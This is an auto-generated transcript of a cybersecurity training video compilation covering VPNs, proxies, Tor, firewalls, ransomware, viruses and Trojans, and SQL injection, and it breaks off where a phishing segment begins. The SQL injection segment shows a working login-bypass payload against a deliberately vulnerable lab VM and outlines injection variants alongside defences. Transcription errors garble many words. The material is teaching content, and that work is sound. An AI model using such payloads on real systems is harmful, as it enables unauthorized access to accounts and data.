data Anonymous and secure when it passes through the public network and the difference between a normal connection and a VPN connection after learning about this Jude was certain that she should start using a VPN to carry out her online transactions in the future this is also applicable to each one of us even if you work remotely or connect to public Wi-Fi using a VPN is the safest option in addition to providing a secure encrypted data transfer vpns are also used to disguise your whereabouts and give you access to Regional web content VPN servers act as proxies on the internet this way your actual location cannot be established VPN enables you to spoof your location and switch to a server to another country and thereby change your location for example by doing so you can watch any content on Netflix that might be unavailable for your region meet Jonathan he is an investigative journalist who occasionally researches and publishes news articles contrary to the government's ideologies on one such occasion he could not access a Global News website dealing with uncensored information it seemed his IP was blocked from visiting the news website with his IP blocked Jonathan turned to a popular proxy service that was able to unblock the news website thereby allowing an open internet to all users just like how your friend gives a proxy attendance for you a proxy server serves as a stand-in user to keep the real client private but what is a proxy let's understand it's working by taking a look at how Jonathan was able to access geoblock content without much hassle a proxy server acts as a Gateway or intermediary server between a user and its destination website when Jonathan wasn't able to access the news website he connected his system to a global proxy server once connected the proxy server assigns a new IP address to Jonathan's system an IP address of a different country where the website is not censored following this process whenever Jonathan visits that website the website administrators see the new IP address assigned via proxy server and sees no reason to deny access to their account once the proxy server is able to access the website it's passed on to Jonathan's system via the same channel regarding accessibility to proxy servers you must first set it up on your computer device or network next check the steps required for your computer or network as each operating system has its setup procedures cases however setup entails using an automated configuration script there are plenty of free proxy services available on the internet however the safety of such proxies is rarely verified most free proxies will provide an IP address and a relevant port for connection purposes repeated proxy providers like smart proxy and write data that run on subscription models will most likely provide credentials to log into when establishing the connection this extra step acts as authentication that verifies an existing subscription on the proxy provider server unlike free providers that are open to all when it comes to hiding IP addresses many people consider a VPN to be the primary solution while that's true up to some extent there are a few things proxies do differently in the case of vpns extra encryption is also carried out to create a secure tunnel between the user's device and a VPN server a VPN is usually much faster more secure thanks to multiple layers of encryption and has little to no downtime proxies tend to be comparatively unsafe with the service owners having the exact IP address of the end user and having no guarantees regarding down times and reliability if you want to know more about how vpns work do watch how Jude could have protected her banking credentials using vpns in our detailed video linked above now let's take a small quiz to check how much we have learned what can a VPN connection provide that a proxy service cannot a new IP address B multiple layers of encryption C access to geoblock content D authentication credentials think about it and leave your answers Below in the comments section and three lucky winners will receive Amazon gift vouchers what about the benefits of a proxy service though besides allowing access to blocked content proxies can serve as an efficient firewall system they can also filter content from third-party websites allowing control over internet usage in many cases browsing speeds are stabilized compared to vanilla Internet thanks to proper optimization on the base proxy server the element of privacy proxies provides is highly lucrative to people looking to hide their actual IP address from as many crying eyes as possible one can easily argue the benefits of using vpns over proxies for added security measures however a few basic tasks don't warrant maximum privacy for the user's side as in other cases for example many consumers worldwide find proxy Services more convenient since all major operating systems starting from Windows to Android allow proxy configuration without the hassle installing new applications as is in the case of a VPN in addition there are services online that function as web proxies allowing users to access block content without any setup from their end they can enter the target URL and the web proxy will route data from its physical server this level of freedom is hard to come by in the case of vpns making proxies an ideal solution for casual browsing with the next generation of Internet exchanges focused on maximum privacy and security a variety of ways have been enforced to maintain them as such censorship has been shifted from the streets to the digital domain forces the standard citizen to derive alternative ways to maintain anonymity major weapon in this battle for privacy and security is the Tor Browser an independent browser meant to browse the internet file reeling information through the Tor Network it serves as a meaningful alternative to the standard internet browsing habits to better understand the purpose of this browser and such we must learn about the work of the Tor Network featuring its own routing protocol the top browser is an easy way to maintain anonymity while browsing without emptying one's wallet let's take a look at the topics to be covered today we start at the explanation of what is the Tor Network and its significance in the working of the top browser we take a look at the onion routing protocol and how it transmits the data from the client devices to the tort directories in order to circumvent government censorship moving on we learn a few features of the Tor Browser and the distinct advantages the Tor Network provides next we learn the difference between using a VPN and a Tor to anonymize internet usage and finally we have a live demonstration of the Tor Browser anonymization features in action let's move on to learning about the Tor Network Tor short for the onion router it's an open source privacy Network that permits users to browse the web anonymously the torque was initially developed and solely used by the US Navy to protect sensitive government Communications before the network was made publicly available the digital era has disrupted the traditional way of doing things in every sector of the economy the rapid rise in development and innovation of digital products has given way to frequent data breaches and cyber thefts in response consumers are increasingly opting for products that offer data privacy and cyber security Tor is one such underground Network that was implemented for the purpose of protecting users identities the torn network is one example of the many emerging technologies that attempt to fill a data privacy void in a digital space plagued by cyber security concerns the torn Network intercepts the traffic from your browser and bounces a user's request of a random number of other user IP addresses then the data is passed to the user requester Final Destination these random users are volunteer devices which are called as nodes or relays the Tor Network disguises your identity by encrypting the traffic and moving it across different Tower relays within the network the Tor Network uses an onion routing technique for transmitting data hence the original name of onion router to operate within the Tor Network a user has to install the Tor Browser any address or information requested using the browser is transmitted through the Tor Network it has its own feature set which we will be covering over later in this video as we discussed already the data passing through the Tor Network must follow a unique protocol known as The Onion routing protocol let us learn more about its unique characteristics in our normal Network usage the data is transmitted directly the sender has data package to transmit which is done directly over a line of communication with either a receiving party or a server of some kind however since the data can easily be captured while being transmitted the security of this exchange is not very reliable moreover it becomes very easy to trace the origin of such requests on many occasions websites with questionable and controversial content are blocked from the ISP this is possible since the ISP is able to detect and spy on user information passing through the network apart from isps there is a steady chance of your private information being intercepted by hackers unfortunately easy detection of the source and contents of a web request make entire network extremely vulnerable for people who seek anonymity over the internet however in the onion routing protocol things take a longer route we have a sender with the top browser installed on the client system the network sends the information to node one's IP address which encrypts the information and passes it on to node 2's address which performs another encryption and passes it on to node 3 address this is the last address which is also known as the exit node this last node decrypts the encrypted data and finally relays the request to the Final Destination which can be another device or a server end this final address thinks the request came from the exit node and grants access to it the encryption process across multiple computers repeats itself from the exit node to the original user the Tor Network obfuscates user IP addresses from unwanted surveillance by keeping the user's request untraceable with multiple servers touching the data it makes the tracking very difficult for both isps and malicious attackers now that we understand the way Tor works let us learn more about the Tor Browser the top browser was developed by a non-profit organization as a part of the Tor project in 2008 and its first public release was announced the Tor Browser is a browser forked from the popular Firefox that anonymizes their web traffic using the torn network if you are investigating a competitor researching and opposing litigant in a legal dispute or just think it's creepy for your ISP or the government to know what websites you visit the top browser might be the right solution before the top browser were developed using that Network to maintain anonymity was a huge task for everyday consumers starting from the setup to the usage the entire process demanded a lot of knowledge and practice the top browser managed to make it easy for users to Traverse the relay servers intor and guarantee the privacy of the data Exchange a major feature of the Tor Browser is the ability to delete all browser history cookies and tracking data the moment it is closed every new launch of the browser opens an empty slate having a usage habits from being tracked and singled out a major feature that is the highlight of the Tor Network is the availability of onion links only a small portion of the World Wide Web is available to the general public we have the Deep Web that contains links that are not allowed to be indexed by standard search engines like Google and Bing the dark web is a further subset of the Deep Web which contains onion links Tor Browser gives you access to these dot onion websites which are only available within the Tor Network onion is a special used top level domain which designates an anonymous onion service which is also known as a hidden service similar to The Links of the Deep Web these onion links provide services like online shopping cryptocurrency and many other products not available in the consumer Internet space often being considered as a Haven for illegal activities and sales on your links provide both information and Assets in a private manner without the risk of spying by authorities browsing the web over Tor is slower than the clear net due to the multiple layers of encryption some web services also blocked our users Tor Browser is also illegal in authoritarian regimes that want to prevent citizens from Reading publishing and communicating anonymously journalists and dissidents around the world have embraced store as a Cornerstone of democracy and researchers are hard at work at improving towards anonymity properties let us take a look at some of the advantages of using the Tor Browser over standard web browsers the highlight of using the Tor Browser is to maintain anonymity over the Internet the cause for such requests can differ from person to person but all of these concerns are answered by the torn Network routing the information via multiple nodes and relay servers make it entirely difficult for the ISP to keep a track of usage data the entire top project is designed to be completely free and open source allowing the code for the browser to be inspected and audited by Third parties helped in the early detection of faulty configurations and critical bugs it is present for multiple operating system starting from laptops to mobile devices a number of websites are blocked by governments for a variety of reasons journalists under authoritarian regimes have difficulty in getting the word out regarding the situation since the onion routing protocol transfers data between multiple servers of random countries the domains being blocked become available when used via tor usage of these encryption messaging platforms is easily enforced using the Tor Browser which otherwise would have been a difficult task under oppressive circumstances many people believe that a VPN offers the same benefits as the top browser let's put both of them to the test and see the differences between them coming to the first point of difference Tor is completely free and open source all of the code for the browser and the network can be audited and has been cleared for security concerns when it comes to VPN there are many different brands which have open source clients but the same cannot be said for their counterparts some have partly open source while some have completely locked up their code so that they cannot be stored in further moving on Tor has multiple relay points in its data transfer protocol between the server and the receiver there are three different IP nodes that number can increase but it will always be more than two once the data is passed from the cylinder it goes through all of those Julia points while in the case of a VPN the connection is made from the client device to the VPN server and then to the requested destination there is no other IP node that comes into work here thereby making the connection a one-to-one between the client and a VPN as a next Point since store handles multiple layers of encryption and the data passes through multiple systems along the way the performance is slow compared to a VPN where the performance is relatively fast due to the less number of nodes the data passes through similarly the multi-layer encryption of Tor is consistent if you use Tor Browser every single request passes so the same layer of encryption and follows the same routing protocol when the case of a VPN different companies offer different levels of encryption some have multi-hop some prefer a single one-to-one connection and these kind of differences make the choice much more variable finally the nodes and relays being used in the Tor Network are volunteer there is no company holding over them so jurisdiction becomes relatively straightforward for instance in the case of vpns many such vpns are hosted by adware companies or are being monitored by Central governments to note the usage information now that we have a better understanding of the Tor Browser and its routing let us take a look at how the Tor Browser can anonymize and protect our internet usage when opening up the Tor Browser for the first time this is the page that you are going to be welcomed with you have the option of connecting to the Tor Network before we start our browsing so let's press connect and we can see that it is connected coming to the anonymization let's check my current location on Google Chrome currently is showing as Navi Mumbai in Maharashtra if we check the same link on the Tor Browser we should get a different address now every link that we open in the Tor Browser will be little delayed and the speed will be hampered because of the multiple layers of encryption like we discussed now as you can see it's showing a German IP and the state of Bavaria this is how the anonymization works there is no VPN configured there is no proxy attached it's straight up the out of the box settings that come inbuilt with the Tor Browser similarly we have an option of cleaning up the data let's say if you want to refresh your location and you want to use a different ID for the next browsing session if we just restart it once and you can have to check it again we should be seeing a different country this time as you can see we have Netherlands right now so this is how we can keep refreshing your address you can keep refreshing your host location so that it cannot be tracked when browsing the internet like we discussed we have some onion links that can only be used on the Tor Network as you can see these kind of links do not open in the Google Chrome browser but once we copy these over to the Tor Browser as you can see we have opened the hidden wiki which is available only on the Tor Network this is kind of an alternative Wikipedia website where we can find articles to read and more information to learn similarly we have another onion link over here which is once again available only for the tall browser now these kind of delays are expected but they are a valid compromise because they maintain the anonymity that many people desire similarly we have found a hidden wallet which is a cryptocurrency wallet which is specifically for dark web members this operates over the Tor Network and this is used by mostly journalists and people who want to anonymize their internet transactions when it comes to dealing money all of the transactions that occur over the Tor Network are almost impossible to track therefore these kind of cryptocurrency wallets are very big on the Deep Web this is just one example while having multiple different wallets for every single cryptocurrency available imagine our houses without a fence or boundary wall this would make our properly easy accessible to trespassers and robbers and place our homes at Great risk right hence fencing our property helps Safeguard it and keeps trespassers at Bay similarly imagine our computers and networks without protection this would increase the probability of hackers infiltrating our Networks to overcome this challenge just like how boundary walls protect our houses a virtual wall helps Safeguard and secure our devices from Intruders and such a wall is known as a firewall firewalls are security devices that filter the incoming and outgoing traffic within a private Network for example if you were to visit your friend who lives in a gated community you would First Take permission from the security guard the security guard would check with your friend if you should be allowed to entry or not if all is well your access is granted on the other hand the security guard would not Grant permission to a trespasser looking to enter the same premises here the entry access depends solely on your friend the resident's discretion the role of the security guard in this case is similar to that of a firewall the firewall works like a gatekeeper at your computer's entry point which only welcomes incoming traffic that it has been configured to accept firewalls filter the network traffic within your network and analyzes which traffic should be allowed or restricted based on a set of rules in order to spot and prevent cyber attacks your computer communicates with the internet in the form of network packets that hold details like the source address destination address and information these Network packets enter your computer through ports a firewall works on a set of rules based on the details of these Network packets like their Source address a destination address content and port numbers only trusted traffic sources or IP addresses are allowed to enter your network when you connect your computer to the internet there is a high chance of hackers infiltrating your network this is when a firewall comes to your Rescue by acting as a barrier between your computer and the internet the firewall rejects the malicious data packet and thus protects your network from hackers on the other hand traffic from trusted websites is allowed access to your network this way a firewall carries out quick assessments to detect malware and other suspicious activities thereby protecting your network from being susceptible to a Cyber attack firewalls can either be Hardware or software software firewalls are programs installed on each computer this is also called a host firewall meanwhile Hardware firewalls are equipments that are established between the Gateway and your network Linksys routers are a good example of a hardware firewall besides this there are other types of firewalls designed based on their traffic filtering methods structure and functionality the firewall that compares each outgoing and incoming Network packet to a set of established rules such as the allowed IP addresses IP protocols port number and other aspects of the packet is known as a packet filtering firewall the incoming Network traffic is not for the predefined rules that traffic is blocked a variant of the packet filtering firewall is the stateful inspection firewall these types of firewalls not only examine each Network packet but also checks whether or not that Network packet is part of an established network connection such firewalls are also referred to as Dynamic packet filtering firewalls our next type of firewall is called a proxy firewall this draws close comparison to how you give proxy attendance for a friend like how you take the authority to represent your friend the proxy firewall pretends to be you and interacts with the internet they come between you and the internet and thereby prevents direct connections this protects your device's identity and keeps the network safe from potential attacks only if the incoming data packet contents are protected the proxy firewall transfers it to you they are also known as application Level Gateway the firewall can spot malicious actions and block your computer from receiving data packets from harmful sources in addition to preventing cyber attacks firewalls are also used in educational institutions and offices to restrict users access to certain websites or applications it is used to avoid access to unauthorized content it's the year 2015 and Richard has just finished playing games on his computer after a long gaming session Richard tries to shut it down the find some random text file in the desktop that says Ransom note the text file mentioned how a hacking group had encrypted Richard's game files and private documents and he had to pay a ransom of 500 worth of bitcoin in the specified Bitcoin address Richard quickly checked his files only to see them being encrypted and unreadable this is the story of how the Tesla Crypt ransomware spread in 2015 which affected thousands of Gamers before releasing the master key used for encrypting the files so what is ransomware for Richard to be targeted by such an attack he must have installed applications from untrusted sources or clicked an unverified link both of them can function as gateways for a ransomware breach ransomware is a type of malware that encrypts personal information and documents while demanding a ransom amount to decrypt them this Ransom payment is mainly done using cryptocurrency to ensure anonymity but can also employ other routes once the files are encrypted or locked behind a password a text files available to the victim explaining how to make the ransom payment and unlock the files for it just like Richard found the ransom note text file on his desktop even after the money has been paid there's no guarantee that the hackers will send the decryption key or unlock the files but in certain sensitive situations victims make the payment hoping for the best having never been introduced to ransomware attacks before this gave Richard an opportunity to learn more about this and he began his research on the topic spread of ransomware mostly starts with phishing attacks to know more about phishing attacks click the link in the button above users tend to click on unknown links received via emails and chat applications promising rewards of some nature once clicked a ransomware files installed on the system that encrypts all the files or blocks access to computer functions they can also be spread via malware transmitted via untrusted application installation or even a compromised wireless network another way to breach a system with ransomware is by using the remote desktop protocol or RDP access a computer can be accessed remotely using this protocol allowing a hacker to install malicious software on the system with the owner unaware of these developments coming to the different types of ransomware first we have Locker ransomware which is the type of malware that blocks standard computer functions from being accessed until the payment to the hackers is complete it shows a lock screen that doesn't allow the victim to use the computer for even basic purposes another type is crypto ransomware which encrypts the local files and documents in the computers once the files are encrypted finding the decryption key is impossible unless the ransomware variant is old and the keys are already available on the internet scareware is fake software that claims to have detected a virus or other issue on your computer and directs you to pay to resolve the problem some types of scareware lock the computer While others simply flood the screen with pop-up alerts without actually damaging files to prevent getting affected by ransomware Richard could have followed a few steps to further enhance his security one must always have backups of their data cloud storage for backup is easy but a physical backup in a hard drive is always recommended keeping the system updated with the latest security patches is always a good idea apart from system updates one must always have reputed antivirus software installed mini antivirus software like Kaspersky and bitdefender have anti-ransomware features that periodically check for encryption of private documents when browsing the internet a user must always check for the lock Sim on the address bar which signifies the presence of https protocol for additional security if a system is infected with ransomware already there is a website nomoreransom.org it has a collection of decryption tools for most well-known ransomware packages it can also help decrypt specific encrypted files if the list of anti-ransomware tools didn't help the victim malware is a malicious software that is programmed to cause damage to a computer system Network and Hardware devices many malicious programs like Trojan viruses worms and Bots which cause damage to the system are known as malware most of the malware programs are designed to steal information from the targeted user or to steal money from the Target by stealing sensitive data let's take a look at the introduction for two different types of malware virus androgen firstly let's take a look what exactly is a virus program a computer virus is a type of malicious program that on execution replicates itself they get attached to different files and programs which are termed as host programs by inserting their code if the attachment succeeds the targeted program is termed as infected with a computer virus now let's take a look at the trojanos Trojan Horse program is a program that disguises itself as a legitimate program but harms a system on installation they hide within the attachments and emails then transfer from one system to another they create bad doors into a system to allow the Cyber criminal to steal our information let's take a look how they function after getting installed into a system firstly we have virus programs the computer virus must contain two parts to infect the system first is a surge routine which locates new files and data that is to be infected by the virus program and the second part is known as the copy routine which is necessary for the program to copy itself into the targeted file which is located by the search routine now let's take a look at the Trojan Horse functioning for Trojan horses entryway into our system is through emails that may look legitimate but may have unknown attachments and when such files are downloaded into the device the closure program gets installed and infects the system they also infect the system on the execution of infected application or the executable file and attacks the system now that we understand what virus and Trojans are let's understand different types of virus androgens let's take a look at different types of viruses the first one is known as the boot sector virus this type of virus damages the booting section of the system by infecting the masterbot record which is also known as MBI this damages the booth sector section by targeting the hard disk of the system then we have the macro virus microvirus is a type of virus that gets embedded into the document related data and is executed when the file is open they also are designed to replicate themselves and infect the system on a larger scale and lastly we have the direct action virus this type of virus gets attached to executable files which on execution activates the virus program and infects the system once the infection of the file is completed they exit the system which is also the reason it is known as a non-resident virus let's take a look at different types of Trojans the first type of Trojan is the back door they are designed to create a backdoor in the system on execution of an infected program they provide remote access of a system to the hacker this way the Cyber criminal can steal our system data and may use it for illegal activities next we have click source project they enter the system by clicking the random pop-ups which we come across on the internet they attempt the user to give their personal details for different transactions or schemes which may provide remote access of a system to the Cyber Criminal and the last Trojan type is Ransom Trojan this type of Trojan program after entering the system blocks the user from accessing its own system and also affects the system function the Cyber criminal Demands a ransom from the targeted user for the removal of the Trojan program from the device now that we understand some details regarding viruses and Trojan let's solve a question the question is Jake was a nice access to his system and he wasn't able to control the data and information in a system now the actual question is what could be the reason behind a systems problem option a macro virus option b Ransom Trojan option C backward Trojan give your answers in the comment section now let's understand how to detect the activity of viruses and Trojan in our system to detect virus or Trojan activity in a system we can refer to the following points for viruses we have slowing down of the system and frequent application freeze shows that the infection of the virus is present in the system then we have the viruses can also steal sensitive data including passwords Account Details which may lead to unexpected logout from the accounts or Corruption of the sensitive data and lastly we have frequent system crashes due to virus infection which damages the operating system for Trojan we have frequent system crashes and system also faces slow reaction time then we have there are more random pop-ups from the system which may indicate Trojan activity and lastly we have modification in the system application and change of the desktop appearance can be also due to the infection of a Trojan program next let's take a look at a famous Cyber attack for virus and nitrogynous for virus we have the midom virus which was identified in the ER 2004 which affected over 50 million systems by creating a network of sending spam emails which was to gain backdoor access into our systems next for the Trojan Horse we have the emote at Trojan program which is specifically designed for financial theft and for stealing Bank related information next we have few points for how to prevent virus entry or Trojan attack for a system the most basic way of virus protection is to using antivirus and do regular viruses can this will prevent virus entry in the system and also having more than one antivirus provides much better protection then avoid visiting uncertified websites can also prevent virus entry into a system then we have using regular driver updates and system updates to prevent virus injury for erosion we have using certified softwares from legal sites to prevent any Trojan activity in our system and also avoid clicking random pop-ups that we often see on the internet and lastly using antivirus and firewalls for protection against Trojan horses is a good habit now that we have reached the end of the video Let's Take a look what we learned for the first part we saw the main objective of the virus is to harm the data and information in a system whereas for the Trojan we have stealing of the data files and information effect of viruses is more drastic in comparison to the Trojan horses then we have viruses which are non-remote programs whereas Trojan horses are remote accessed and lastly viruses have the ability to replicate itself to harm multiple files whereas Trojan does not have the replication ability so let's begin with what is SQL injection as the name suggests SQL injection vulnerability allows an attacker to inject Mauritius input into a SQL statement so SQL stands for structured query language which is a language used by an application to interact with the database now normally this attack is targeted towards a database to extract the data that is stored within however the vulnerability does not lie in the database itself the vulnerability will always lie in the application it is the developer's prerogative of how to develop the application how to configure it to prevent SQL injection queries from happening a database is created to answer questions and if a question is asked it is supposed to answer it database needs to be configured for some amount of security but the vulnerability the flaw here for SQL injection will always lie in the application itself it does how the application interacts with the database that needs to be modified that needs to be maintained by the developer rather than just configuring the database itself so the attacker at this point in time when they send a query to the application will form a malformed query by injecting a particular command or an operator that is recognized by the SQL language and if that operator is passed through the application to the database then the database basically gets cracked or does a data dump because of that unwanted character coming in so this character needs to be filtered at the application Level itself now let's look at a quick demo so what we have done here is I have this virtual machine called ovasp broken web applications virtual machine version 1.2 I'm going to power this on till this power is on I'm going to show you where we can download this utility from so you can just look for oovasp broken web application project download you'll find it on sourcefold.net click on the link you can download the broken web application project from here this is a 1.9 GB download and you can have a zip machine directly for VMware or every Oracle virtual box now this is an application that has been developed by ovasp which stands for open web application security project which is a not-for-profit organization and uh periodically releases the most top 10 risks that an application will face for that particular year so they have given a web application uh with inbuilt vulnerabilities for professionals like us to practice upon to developables our skills upon because doing this in the real world is illegal I cannot go onto a website to demonstrate how a SQL injection attack works uh neither should you try your hands on it till you become very well rehearsed with it so till to upgrade your skills to upskill yourself please download this machine host it in a VMware Workstation or a Oracle virtual box and you can uh then try your skills on it right so just going back to the browser here if I open up a new tab you'll see that this machine has booted up and has an IP address called 71.132 so if I just go on to that IP address and I type in 192 168 71.132 and you'll see the last broken web application project and there are a lot of training applications realistic intentionally vulnerable applications old versions of real applications and so on so forth so there is a lot of applications in built over here that you can try your skills upon we are going to try to use the ovas mutility over here uh this gives you the uh OS top 10 risks for 2010 2013 2017 is the latest one so far uh but the difference between 2013 and 2017 is that some of these have changed but not all of them the order has changed a little bit but you can see that SQL injection is on the top A1 amongst the injection attacks right and you can see there are multiple types that have been given here the SQL injection for extracting data or SQL injection for bypass authentication or insert your injection attacks blind SQL injection and then there is a tool called SQL map which is available freely on on your Linux machines curly Linux or parrot Linux whichever you want to use for your practice targets and so on so forth so if I just take you here for bypass Authentication and this is a regular login page that an application may have right you look at a username you look at password you type that in and you log in so let's say I don't know a password here I'm just going to type in the username test password as psswrd I'll try to log in and it shows me that the account does not exist so the authentication mechanism does work I did try type in a username and password it wasn't recognized so the account does not exist now let's try to type in a SQL query here I'm going to just give it a single quote which is an operator that is recognized by the SQL language which when the database tries to execute uh will cause the database to dump some data or to bypass authentication in this case and I'm going to give it a condition single quote or 1 equals one space hyphen hyphen space and I'm going to click on login now right now I'm not logged in at all and we tried our username and password and we weren't able to log in so now if I log in you will see that it gives me a status update saying the user has been authenticated and I'm logged in as admin got root so that is what these SQL queries can achieve I'm going to log out right now and we're going to look at the basics of SQL injection so looking at that small demo looking now let's look at what types of SQL injections are available so the first is inbound SQL injection the there are two subtypes within in band error based injection attack and a union based injection attack the second type is blind SQL injection attack where there's a Boolean based and a time-based attack and the third one is out of bound SQL injection attack now what is Advanced SQL injection attack in bandage where we are either attempting the error base or the union base what is error based uh we send a query to the database we craft a query to the database and uh it generates an error message and it dumps the error message right in front of us on the screen that makes us realize that there is a flaw and there there is some information that is dumped on the screen which we can then further utilize to craft our further queries as we go ahead whereas Union based is it is where we combine multiple statements at the same time so if you look at the URL earlier in the URL you would see a large structure in that URL we can try to add more two or more statements within the URL itself to combine them and then confuse the database into executing both the statements together and giving a data dump at the same time right so what would a error based uh SQL injection look like if I go back to the same database which is here right and if you remember the username we gave it a single quote or one equals one space hyphen hyphen space we gave it the condition right so basically what it did was this a single code is an operator that goes to the database selects the default uh table in the user tables in this database column and then Compares it to the condition that is given so the condition that we gave was 1 equals 1 which is always true so what it did was it selected the default uh user table that was available in the database and instead of comparing it to a password it compared it to the condition so if I give it 1 equals to where the condition is false and if I log in you will see that the account doesn't exist comes back again because the condition was false and instead of comparing the user account to the password it basically compared the user account to the condition so if I give it a single quote or 1 equals one hyphen iPhone space and login you can see that this is a correct condition and thus we are able to log in now before we even go to that extent if I just forget the condition over here and I just give it a single quote the operator and I send this operator to the database and I click on login you will see that it generates an error which is right on top and it tells us the line the file where the error happened and you can see it happened in the MySQL handler.php file right and then it gave us the message you have an error in your SQL syntax check the manual that corresponds to your MySQL server version for the right syntax to use now why would a hacker want to do this in the first place because there are different types of databases so there is a MySQL Ms SQL or Microsoft SQL Oracle SQL IBM db2 all of these are variations of the SQL database they use the SQL language however every database has its own Command right there they have their own syntax they have their own specific commands that are utilized for the database so in this scenario the hacker wants to identify what database is being currently utilized so they can craft those particular queries so now with this injection with just me sending the quote and the error getting generated I now come to know that we are using a MySQL server and the version of that server is 5.1.73 and uh the rest of the information about where the handlers are located and so on so forth right this gives the information to the hacker of how they want to proceed next what kind of queries they want to create what kind of syntax they want to utilize so error base attack is where you generate these kind of Errors uh and you get this information the union base is where you craft your queries within the URL or you can try to combine multiple statements within the input fields and try to generate a response from that when we come to Boolean based SQL injection sends a SQL query to the database which forces the application to return a different result depending on whether the query returns it true or a false result so basically if the input is false the input both the inputs are false the output would be false there's one input that is false the other input that is true input B the output would be true and so on so forth right so depending on the result from the inputs the attacker will come to know which input is true with this he can then access the database of the website so you're trying to figure out by sending out multiple inputs and then analyzing the output to see what exactly which command exactly worked what was the resultant output of that command thus from this kind of an information the hacker can infer their next step forward then you have time based SQL injections uh now there are times when a database administered or an application administrator has done some security configuration and thus have disabled verbose error messages now what is a verbose error message the error message that we saw right here is a verbose error message that means that the message gives out details the message gives out details about what the database is the version and whatnot so if they have sanitized these errors and you no longer can generate these errors and thus you cannot figure out what database is then what do you do right for example if I just take you to Simply learn and foreign take you to a URL that is supposedly not accessible you can see that it gives a generic error oops like it looks like you have crash landed on Mars it doesn't give you a verbose error that we saw here so this gives us a detailed error of what went wrong where it gives us the database the version of the database and where the query went wrong and etc etc etc whereas on this side where there's some there's a lot of security that goes in here so you can see that it doesn't generate a error it just get a generic page in front of you so in that case what does a hacker do so the hacker then injects a time-based uh query in the URL which allows us to verify whether the command is being executed or not so we put in a Time weight let's say 10 seconds of time wait so if we the moment we inject the query if the query times for 10 seconds and then gets executed that means that the SQL injection is possible however if we inject the query and it just gets executed without the delay that means that the time uh injection attack would not be uh possible on that particular site out of bound is not a very common attack it depends on the features being there enabled in the database management system that has been used by the web application so this can be a somewhat of a misconfiguration error by the database administrator where you have enabled functions and not sanitize them so you have not done in access controls properly you have not given account control so queries should never be executed at an administrative level they should always be executed a user level with minimum privileges that are required for that query to be executed now if you're allowing these kind of functions to be to be enabled at the dbms and there is an administrative account that can have access to them at that point in time and out of bound injection attack is possible so let's look at how our website works right uh how SQL works on a website now the website is constructed of HTML hypertext markup language which would include JavaScript for functionality cascading style sheets for the mapping of the website right and then the react.js and whatnot uh for for the functionality now when we send a query to the website it is normally using the HTTP protocol or https protocol when the query reaches the application the application would then go ahead and generate the SQL query uh at the client side you'll have all these scripting languages coming in on the front end that we can utilize to craft queries and then send them across at the server side you will have uh databases like Oracle MySQL MSC equal and so on so forth that will then execute those queries right so just to give you an example if I use a tool called Postman what we generally do when we craft a query is we send out a get request to the website and then we will see a response from the site with the HTML code and everything so this is a tool that is utilized by software testers to test the responses that you're going to get from various websites so on the left hand side you can see I've used it on quite a bit here we have an example for gmail.com so let's continue with that so this is a get request being sent to Gmail the moment I send it is going to create an HTTP request and send it across the response that I get is this this is the HTML code for gmail.com right these are the cookies these are the headers that include information so it you can see this is a text HTML character set utilized is UDF eight and the configuration that has been done with the application right so this is where everything comes in this is the cookie that has been sent with that particular request that I had sent out now if we Analyze This query right so when we went on to this application and I typed in that single quote and we generated this error right you can see that the application converted this into a SQL query so the query was select username from accounts where the username in quote single quotes and we use the support right the single quote right there so uh that's where we use that operator and that's where the exception error occurred so these are the kind of queries that are structured by the application and then taken on to the database for execution when we type in uh it is a HTTP get request with the username and password within that query that is sent to the application the application converts it into a SQL query sends it to the database and the database responds with the appropriate response so how do we prevent SQL injection in the first place use prepared statement and parameterized queries these statements make sure that the parameters pass into SQL statements are treated in a safe manner so for example we saw that the single code was an operator this shouldn't be allowed to be utilized in the first place right so here what we are doing here is a secure way of running a SQL query in the jdbc using a parameterized statement Define which user we want to find so there's a string the email comes in connection to the database we are going to figure out how the connection is going to be passed how it is going to be created construct the SQL statement we want to run specifying the parameter right so we Define how is it going to be created what is going to be created what can be passed through the database and what should not be passed to the database so that is one way of uh utilizing prepaid statements and parameterized queries where we have object relational mapping most development teams prefer to use objection object relational mapping Frameworks to evade the translation of SQL results set into code objects more seamless so this is an example of object relational mapping where we map certain objects and allow that to be executed and then escaping inputs in a simple way to protect against most SQL injection attacks many languages have standard functions to achieve this right so you need to be very careful while using Escape characters in your code base when a SQL statement is constructed not all injection attacks rely on abuse of quote characters so you need to know what characters are being utilized in the configuration that you have created in the structure that you have created in the code that you have created uh which characters are being recognized as operators you need to sanitize those operators and you need to basically ensure that these operators cannot be accepted as user input if they are they have read it out by the application and they never reach the database other methods of preventing SQL injection are password hashing so that passwords cannot be bypassed the passwords cannot be recovered passwords cannot be cracked uh third party authentication you use oauth or some other service for a single sign-on mechanism does you rely on a third party to maintain the security of authentication and uh what kind of parameters are passed for example uh using LinkedIn logins or Facebook logins right for the Layman you normally go on to Facebook and you allow if you're using a game right if you start playing a game you're allowed to log into the game using your Facebook credentials or your Google credentials now that is not just for ease of use but the game user the developer has outsourced the authentication mechanisms to third parties such as Facebook or Google because they understand that that authentication mechanism is as safe as can be Facebook and Google are wealthy organizations uh hire a lot of Security Experts and the development for their authentication mechanisms is Top Notch the small organization cannot spend that kind of money on security itself right so you use a third party authentication mechanism to ensure that these kind of attacks may not happen then web application firewalls uh having a web application firewall and configuring it properly uh for SQL injection attacks is one of the Sure Shot method of uh mitigating or minimizing that uh threat in the first place so at this point in time you have realized that the application has some vulnerabilities for SQL injection and instead of recoding or restructuring the application uh you want to take the easier way out or the cheaper way out so what you do is you you install a web application firewall and you configure the web application firewall to identify malicious queries and stop them at the firewall level itself so they never reach the application and thus the vulnerabilities on the application don't get executed buy better software and I'll keep on updating the software so it's not necessary that once you have a software you install it it's going to be safe for Life new vulnerabilities are discovered every day every hour and it may so happen what is secure today may be completely insecure tomorrow or the day after right so you need to keep on upgrading the software if there are no upgrades available and the volatility still exists you might want to migrate to a better software and thus ensure that you don't get hacked right always updated use patches organizations keep on sending out updates and patches as and when they are released you need to install them to enhance your security postures and then continuously monitor SQL statements and databases use protocol monitors uh use different softwares use the firewalls to keep on monitoring what kind of queries you're getting and based on those queries you want to ensure the inputs and the queries that are creating uh are not detrimental to the health of the software that you have Jane is relaxing at home when she receives an email from a bank that asks her to update her credit card pin in the next 24 hours as a security measure judging the severity of the message Jane follows the link provided in the email on delivering her current credit card pin and the supposedly updated one the website became unresponsive which prompted her to try sometime later however after a couple of hours she noticed a significant purchase from a random website on that same credit card which she never authorized frantically contacting the bank Jane realized the original email was a counterfeit or a fake message with a malicious link that Intel credit card fraud this is a classic example of a phishing attack fishing attacks are a 